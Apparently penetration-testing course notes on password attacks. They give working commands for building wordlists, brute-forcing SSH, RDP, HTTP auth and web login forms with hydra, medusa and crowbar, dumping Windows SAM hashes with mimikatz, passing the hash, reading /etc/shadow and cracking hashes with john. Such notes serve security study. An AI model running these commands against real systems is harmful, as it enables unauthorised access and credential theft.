Password Attacks
Wordlists
Save more time at the expense of low coverage.
Try the most possible passwords.
/usr/share/wordlists
Standard Wordlists
To create custom password lists
cewl --help | less
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # scrape website, search for words with at least 6 chars and write them to a txt
Use John to create different styles of passwords
sudo nano /etc/john/john.conf
# find [List.Rules:WordList]
# set some rules, such as adding 2 digits at the end of each password
$[0-9]$[0-9]
john --wordlis=megacorp-cewl.txt --rules --stdout > mutate.txt
Brute Force Wordlists
Test every password combinations.
Generate brute force passwords in a certain pattern to save time with 'crunch'
| Placeholder | Character Translation |
|---|---|
| @ | Lower case alpha characters |
| , | Uppercase alpha characters |
| % | Numeric characters |
| ^ | Special characters including space |
crunch 8 8 -t ,@@^^%%% # generate pwd with min and max length of 8 chars, -t to specify pattern
crunch 4 6 0123456789ABCDEF -o crunch.txt # use only some characters
# /usr/share/crunch/charset.lst generate pwd with predefined char sets
crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt # choose char set, and mixalpha for upper/lower letters
Common Network Service Attack Methods
HTTP htaccess Attack with Medusa
medusa -h <HOST IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
Remote Desktop Protocol Attack with Crowbar
sudo apt install crowbar
crowbar -b rdp -s <HOST IP> -u admin -C <password file> -n 1 # -b for protocol, -n for number of thread
SSH Attack with THC-Hydra
# -l target username
# -P Wordlist
# protocol://IP protocol and IP address
hydra -l kali -P <pwd file> ssh:<IP>
HTTP POST Attack with THC-Hydra
hydra http-form-post -U | less # provide more arguments for a form
# look at web page source code first for understanding how a form looks like
hydra <IP> http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P <pwd file> -vV -f
# -f for: stop after first success
Leveraging Password Hashes
Retrieving Password Hashes
hashid "<hash>" # analyze hash
Use mimikatz to retrieve pwd hashes from windows
# Within mimikatz
privilege::debug
token::elevate # elevate from high integrity to system integrity
lsadump::sam # dump hashes
Passing the Hash in Windows
Use hash to authenticate instead of clear text password. Since Windows doesn't use salt with hashes, the hashes are static. So if 2 machines has the same username and password, you could use the hash of one machine to login to the other.
pth-winexe -U <USERNAME>%<HASH> //<IP> cmd
Password Cracking
Process of recovering the clear text of a password given its hashed form.
# windows hashes
john hash.txt --format=NT
john --wordlist=<word list> hash.txt --format=NT
john --rules --wordlist=<word list> hash.txt --format=NT
# linux cracking
grep <username> /etc/passwd > pwd-file.txt
sudo grep <username> /etc/shadow > shadow-file.txt
unshadow pwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=<rockyou.txt> unshadowed.txt
# --fork to multithread on older versions, default in new versions
# --node distribute load on multiple computers
John is limited by CPU speed.
https://hashcat.net: use GPU.